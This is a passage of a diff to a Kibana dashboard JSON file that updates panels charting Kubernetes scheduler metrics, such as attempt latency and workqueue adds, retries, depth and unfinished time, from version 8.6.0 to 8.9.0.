"right" }, - "panelIndex": "181a3fe5-e5b5-472e-98af-ea4aaadc3109", - "title": "Average scheduling attempt latency", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2b43c72b-5964-4c48-8239-72a42fbe334f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2b43c72b-5964-4c48-8239-72a42fbe334f": { - "columnOrder": [ - "9a10de81-8e85-4356-8381-5cd24bd4f88e", - "afa79db7-0c03-40d0-a80b-6bf59b9a4925", - "46b12a48-f8b8-42ca-bfd6-adec41da55ed", - "46b12a48-f8b8-42ca-bfd6-adec41da55edX0", - "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" - ], - "columns": { - "46b12a48-f8b8-42ca-bfd6-adec41da55ed": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Attempts", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.scheduler.scheduling.attempts.duration.us.sum))", - "isFormulaBroken": false - }, - "references": [ - "46b12a48-f8b8-42ca-bfd6-adec41da55edX1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "46b12a48-f8b8-42ca-bfd6-adec41da55edX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.scheduling.attempts.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Attempts", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.scheduling.attempts.duration.us.sum" - }, - "46b12a48-f8b8-42ca-bfd6-adec41da55edX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Attempts", - "operationType": "counter_rate", - "references": [ - "46b12a48-f8b8-42ca-bfd6-adec41da55edX0" - ], - 
"scale": "ratio", - "timeScale": "s" - }, - "9a10de81-8e85-4356-8381-5cd24bd4f88e": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.scheduler.result + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 3 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.result" - }, - "afa79db7-0c03-40d0-a80b-6bf59b9a4925": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "30s" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Attempts counter rate by result" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "w": 48, + "x": 0, + "y": 26 + }, + "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(205,245,246,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Workqueue", + "markdown_css": "font-family:system-ui,\"Segoe 
UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "w": 24, + "x": 0, + "y": 29 + }, + "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6572ee4d-01b4-47db-8804-d8ef217e21da", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { + "columnOrder": [ + "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + 
"4266ba8e-3786-4162-9140-15f600580db0", + "5b2495ee-2297-4e20-81d3-ac385205cb01", + "5b2495ee-2297-4e20-81d3-ac385205cb01X1", + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "columns": { + "4266ba8e-3786-4162-9140-15f600580db0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "5b2495ee-2297-4e20-81d3-ac385205cb01": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Counter rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.adds.count))", + "isFormulaBroken": false + }, + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.adds.count: *" + }, + "isBucketed": false, + "label": "", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.adds.count" + }, + "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "", + "operationType": "counter_rate", + "references": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Workqueues", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - 
"language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "46b12a48-f8b8-42ca-bfd6-adec41da55ed" - ], - "layerId": "2b43c72b-5964-4c48-8239-72a42fbe334f", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9a10de81-8e85-4356-8381-5cd24bd4f88e", - "xAccessor": "afa79db7-0c03-40d0-a80b-6bf59b9a4925" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6572ee4d-01b4-47db-8804-d8ef217e21da", + "key": "kubernetes.scheduler.workqueue.adds.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.adds.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "d35d8849-89ba-42b8-8120-c14b087f9690", - "w": 24, - "x": 24, - "y": 12 + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "5b2495ee-2297-4e20-81d3-ac385205cb01" + ], + "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": 
"top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", + "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "d35d8849-89ba-42b8-8120-c14b087f9690", - "title": "Attempts counter rate by result", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue additions increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "1cd3ebab-9630-4253-b9a6-5f921e5cb617", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "55eaa53f-a391-4996-9721-2f7af9aa963d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77b347b2-91fa-470f-861d-ada0e175cbc4": { + "columnOrder": [ + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "34f7328b-5fef-43e7-9350-98256b031a79", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "columns": { + "34f7328b-5fef-43e7-9350-98256b031a79": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": 
"date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(205,245,246,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_0599e0ae-2375-4ceb-b12d-2ebec4310cc6_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Workqueue", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } + "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.scheduler.name + 1 other", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.scheduler.workqueue.retries.count", + "operationType": "max", + "params": { + 
"emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.retries.count" + }, + "orderBy": { + "type": "custom" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" + }, + "secondaryFields": [ + "host.name" ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + }, + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Rate", + "operationType": "formula", + "params": { + "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.retries.count))", + "isFormulaBroken": false + }, + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1" + ], + "scale": "ratio", + "timeScale": "s" }, - "title": "", - "type": "metrics", - "uiState": {} + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.retries.count: *" + }, + "isBucketed": false, + "label": "Part of Rate", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.retries.count" + }, + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Rate", + "operationType": "counter_rate", + "references": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "55eaa53f-a391-4996-9721-2f7af9aa963d", + "key": 
"kubernetes.scheduler.workqueue.retries.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.retries.count" } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "w": 48, - "x": 0, - "y": 26 + "layers": [ + { + "accessors": [ + "a1a9d92a-c7cc-43f4-950a-25dd5108bf71" + ], + "layerId": "77b347b2-91fa-470f-861d-ada0e175cbc4", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", + "xAccessor": "34f7328b-5fef-43e7-9350-98256b031a79" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true }, - "panelIndex": "0599e0ae-2375-4ceb-b12d-2ebec4310cc6", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue retries increase rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "3a26dffa-0696-485d-b991-1dbc5092082e", + "w": 24, + "x": 0, + "y": 43 + }, + "panelIndex": "3a26dffa-0696-485d-b991-1dbc5092082e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-layer-2b80230c-9cc8-444f-b092-1fbc4d764992", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2b80230c-9cc8-444f-b092-1fbc4d764992": { + "columnOrder": [ + "e7259e4c-0700-48a5-aeff-993fc075bcab", + "7b8d9b03-439b-4171-8b64-91b8664b4b94", + "725088f8-ac91-4df6-8863-f9abe7ad40cd", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1", + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" + ], + "columns": { + "725088f8-ac91-4df6-8863-f9abe7ad40cd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Depth", + "operationType": "formula", + "params": { + "formula": "differences(average(kubernetes.scheduler.workqueue.depth.count, kql='kubernetes.scheduler.workqueue.depth.count: *'))", + "isFormulaBroken": false + }, + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1" + ], + "scale": "ratio", + "timeScale": "s" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.workqueue.depth.count: *" + }, + "isBucketed": false, + "label": "Part of Depth", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.depth.count" + }, + "725088f8-ac91-4df6-8863-f9abe7ad40cdX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Depth", + "operationType": "differences", + "references": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cdX0" + ], + "scale": "ratio" + }, + "7b8d9b03-439b-4171-8b64-91b8664b4b94": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + 
"sourceField": "@timestamp" + }, + "e7259e4c-0700-48a5-aeff-993fc075bcab": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Depth", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of kubernetes.scheduler.workqueue.depth.count", + "operationType": "sum", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.depth.count" }, - { - "id": "metrics-*", - "name": "6572ee4d-01b4-47db-8804-d8ef217e21da", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7": { - "columnOrder": [ - "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "4266ba8e-3786-4162-9140-15f600580db0", - "5b2495ee-2297-4e20-81d3-ac385205cb01", - "5b2495ee-2297-4e20-81d3-ac385205cb01X1", - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "columns": { - "4266ba8e-3786-4162-9140-15f600580db0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Counter rate", - "operationType": "formula", - "params": { - "formula": "counter_rate(last_value(kubernetes.scheduler.workqueue.adds.count))", - "isFormulaBroken": false - }, - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X1" - ], - "scale": "ratio", - "timeScale": "s" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.adds.count: *" - }, - "isBucketed": false, - "label": "", - "operationType": 
"last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.adds.count" - }, - "5b2495ee-2297-4e20-81d3-ac385205cb01X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "", - "operationType": "counter_rate", - "references": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "f2d3349e-531e-453c-bac7-fc4c1a47ea86": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Workqueues", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6572ee4d-01b4-47db-8804-d8ef217e21da", - "key": "kubernetes.scheduler.workqueue.adds.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.adds.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "multi_terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "layers": [ - { - "accessors": [ - "5b2495ee-2297-4e20-81d3-ac385205cb01" - ], - "layerId": "76c85206-02c1-4f35-bb0d-c1d4d3ee59d7", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", 
- "showGridlines": false, - "splitAccessor": "f2d3349e-531e-453c-bac7-fc4c1a47ea86", - "xAccessor": "4266ba8e-3786-4162-9140-15f600580db0" - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "secondaryFields": [ + "host.name" + ], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.scheduler.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "09d7cafe-19c4-4da8-a1b9-5ecd3ec6b0b0", + "key": "kubernetes.scheduler.workqueue.depth.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.workqueue.depth.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "layers": [ + { + "accessors": [ + "725088f8-ac91-4df6-8863-f9abe7ad40cd" + ], + "collapseFn": "", + "layerId": "2b80230c-9cc8-444f-b092-1fbc4d764992", + "layerType": "data", + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "e7259e4c-0700-48a5-aeff-993fc075bcab", + "xAccessor": "7b8d9b03-439b-4171-8b64-91b8664b4b94" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 14, - "i": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "w": 24, - "x": 0, - "y": 29 + "preferredSeriesType": "bar_stacked", + "title": "Empty XY 
chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "2ba53067-d43d-42eb-ac50-2d941977ce95", - "title": "Workqueue additions increase rate", - "type": "lens", - "version": "8.6.0" + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77b347b2-91fa-470f-861d-ada0e175cbc4", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Workqueue depth rate" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "w": 24, + "x": 24, + "y": 43 + }, + "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-a2facaed-7c02-4fb6-9126-5512b8ffd26f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "695725fe-9d35-49c6-8289-21fbe54ff2a6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { + "columnOrder": [ + "73933c6b-b6da-45c6-a190-c501453f658f", + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778", + "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" + ], + "columns": { + "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "10s" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "73933c6b-b6da-45c6-a190-c501453f658f": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of kubernetes.scheduler.name + 1 other", + "operationType": "terms", + 
"params": { + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Maximum of kubernetes.scheduler.workqueue.unfinished.sec", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" }, - { - "id": "metrics-*", - "name": "55eaa53f-a391-4996-9721-2f7af9aa963d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77b347b2-91fa-470f-861d-ada0e175cbc4": { - "columnOrder": [ - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb", - "34f7328b-5fef-43e7-9350-98256b031a79", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X1", - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71X0" - ], - "columns": { - "34f7328b-5fef-43e7-9350-98256b031a79": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "68f1dece-b63b-4a27-9c1f-8068f2f9bedb": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.scheduler.name + 1 other", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.scheduler.workqueue.retries.count", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.retries.count" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - }, - "a1a9d92a-c7cc-43f4-950a-25dd5108bf71": { - "customLabel": true, - 
